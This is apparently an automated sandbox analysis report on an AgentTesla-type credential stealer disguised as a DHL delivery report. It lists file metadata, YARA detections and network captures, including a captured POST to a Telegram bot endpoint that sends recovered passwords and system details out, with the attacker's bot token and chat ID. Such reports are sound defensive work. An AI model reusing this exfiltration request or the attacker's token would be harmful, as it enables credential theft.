                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):6.275416787941844
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:Dhl recent package delivery report needs attention.exe
                                    File size:550400
                                    MD5:163d3bc2c523dc10c959474aa3f69d56
                                    SHA1:5338e0aaea69b582d22ff624b4a9fd4efc9eb707
                                    SHA256:1040411f26f6464fb485e92e74c08c559a6feb9bed0eadc44e831a08c80e8a01
                                    SHA512:675538d727c564fc80a42b868a4025105ae8c4df10da5e5df0aa93c95be608ff9f89e5b35a366fba6f2a5aac703aca46a9d5c76978a160b64824b8b09527c5c1
                                    SSDEEP:6144:PEmVKcUXWckAJnwNtuOeB2d/t8CdZy9QD/EsQYhT6qphrf5mAz2:MmTUGvxeBJCd5DMTbqz5Dz
                                    TLSH:1AC49E1D638F0FD1D36A063D82A19654C238EE15C886F70F78C02BB6E9363D79961B67
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.}b............................g.... ........@.. ....................................@................................
                                    Icon Hash:9aa3a38a8383929a
                                    Entrypoint:0x45ec67
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x627DB860 [Fri May 13 01:46:08 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5ec1d0x4a.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x2926c.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x5cc6d0x5ce00False0.763629815781data7.52092762283IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0x600000x2926c0x29400False0.0292850378788data1.62115337498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x8a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountry
                                    RT_ICON0x600ac0x10828dBase III DBT, version number 0, next free block index 40
                                    RT_ICON0x708f80x25a8dBase III DBT, version number 0, next free block index 40
                                    RT_ICON0x72ec40x10a8data
                                    RT_ICON0x73f900x468GLS_BINARY_LSB_FIRST
                                    RT_ICON0x7441c0x10828dBase III DBT, version number 0, next free block index 40
                                    RT_ICON0x84c680x25a8dBase III DBT, version number 0, next free block index 40
                                    RT_ICON0x872340x10a8data
                                    RT_ICON0x883000x468GLS_BINARY_LSB_FIRST
                                    RT_DIALOG0x887a40x11cdata
                                    RT_GROUP_ICON0x889260x3edata
                                    RT_GROUP_ICON0x889b00x3edata
                                    RT_VERSION0x88a2a0x60cdata
                                    RT_MANIFEST0x890720x1faXML 1.0 document, ASCII text, with very long lines, with no line terminators
                                    DLLImport
                                    mscoree.dll_CorExeMain
                                    DescriptionData
                                    Translation0x0409 0x04e4
                                    TimestampSource PortDest PortSource IPDest IP
                                    May 14, 2022 15:11:12.245178938 CEST49770443192.168.2.6149.154.167.220
                                    May 14, 2022 15:11:12.245270014 CEST44349770149.154.167.220192.168.2.6
                                    May 14, 2022 15:11:12.245419979 CEST49770443192.168.2.6149.154.167.220
                                    May 14, 2022 15:11:12.278245926 CEST49770443192.168.2.6149.154.167.220
                                    May 14, 2022 15:11:12.278285980 CEST44349770149.154.167.220192.168.2.6
                                    May 14, 2022 15:11:12.339421034 CEST44349770149.154.167.220192.168.2.6
                                    May 14, 2022 15:11:12.339623928 CEST49770443192.168.2.6149.154.167.220
                                    May 14, 2022 15:11:12.343590021 CEST49770443192.168.2.6149.154.167.220
                                    May 14, 2022 15:11:12.343640089 CEST44349770149.154.167.220192.168.2.6
                                    May 14, 2022 15:11:12.343913078 CEST44349770149.154.167.220192.168.2.6
                                    May 14, 2022 15:11:12.552504063 CEST44349770149.154.167.220192.168.2.6
                                    May 14, 2022 15:11:12.552637100 CEST49770443192.168.2.6149.154.167.220
                                    May 14, 2022 15:11:12.754854918 CEST49770443192.168.2.6149.154.167.220
                                    May 14, 2022 15:11:12.787767887 CEST44349770149.154.167.220192.168.2.6
                                    May 14, 2022 15:11:12.791682959 CEST49770443192.168.2.6149.154.167.220
                                    May 14, 2022 15:11:12.832510948 CEST44349770149.154.167.220192.168.2.6
                                    May 14, 2022 15:11:12.906265974 CEST44349770149.154.167.220192.168.2.6
                                    May 14, 2022 15:11:12.906373024 CEST44349770149.154.167.220192.168.2.6
                                    May 14, 2022 15:11:12.906445026 CEST49770443192.168.2.6149.154.167.220
                                    May 14, 2022 15:11:12.908200979 CEST49770443192.168.2.6149.154.167.220
                                    TimestampSource PortDest PortSource IPDest IP
                                    May 14, 2022 15:11:12.166580915 CEST6035053192.168.2.68.8.8.8
                                    May 14, 2022 15:11:12.184549093 CEST53603508.8.8.8192.168.2.6
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    May 14, 2022 15:11:12.166580915 CEST192.168.2.68.8.8.80x81ffStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    May 14, 2022 15:11:12.184549093 CEST8.8.8.8192.168.2.60x81ffNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                    • api.telegram.org
                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.649770149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                    TimestampkBytes transferredDirectionData
                                    2022-05-14 13:11:12 UTC0OUTPOST /bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=---------------------------8da35bf231981d6
                                    Host: api.telegram.org
                                    Content-Length: 1007
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    2022-05-14 13:11:12 UTC0INHTTP/1.1 100 Continue
                                    2022-05-14 13:11:12 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 66 32 33 31 39 38 31 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 34 33 36 39 38 32 31 37 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 66 32 33 31 39 38 31 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 32 38 34 39 39 32 0a 4f 53 46
                                    Data Ascii: -----------------------------8da35bf231981d6Content-Disposition: form-data; name="chat_id"1436982177-----------------------------8da35bf231981d6Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/284992OSF
                                    2022-05-14 13:11:12 UTC1INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Sat, 14 May 2022 13:11:12 GMT
                                    Content-Type: application/json
                                    Content-Length: 631
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    {"ok":true,"result":{"message_id":5078,"from":{"id":5279095555,"is_bot":true,"first_name":"boxxyp","username":"boxxypbot"},"chat":{"id":1436982177,"first_name":"Boxxy","last_name":"P","username":"boxxypp","type":"private"},"date":1652533872,"document":{"file_name":"user-284992 2022-05-14 03-33-27.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIT1mJ_qnCzOjFwD6ifMyNDB4pELbX9AAKMCgAC-U8AAVBDCA9F3VY0SCQE","file_unique_id":"AgADjAoAAvlPAAFQ","file_size":431},"caption":"New PW Recovered!\n\nUser Name: user/284992\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                    Click to jump to process

                                    Target ID:1
                                    Start time:15:10:50
                                    Start date:14/05/2022
                                    Path:C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe"
                                    Imagebase:0x1e0000
                                    File size:550400 bytes
                                    MD5 hash:163D3BC2C523DC10C959474AA3F69D56
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low

                                    Target ID:2
                                    Start time:15:10:54
                                    Start date:14/05/2022
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                    Imagebase:0x930000
                                    File size:2688096 bytes
                                    MD5 hash:B3A917344F5610BEEC562556F11300FA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.381707170.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:moderate

                                    No disassembly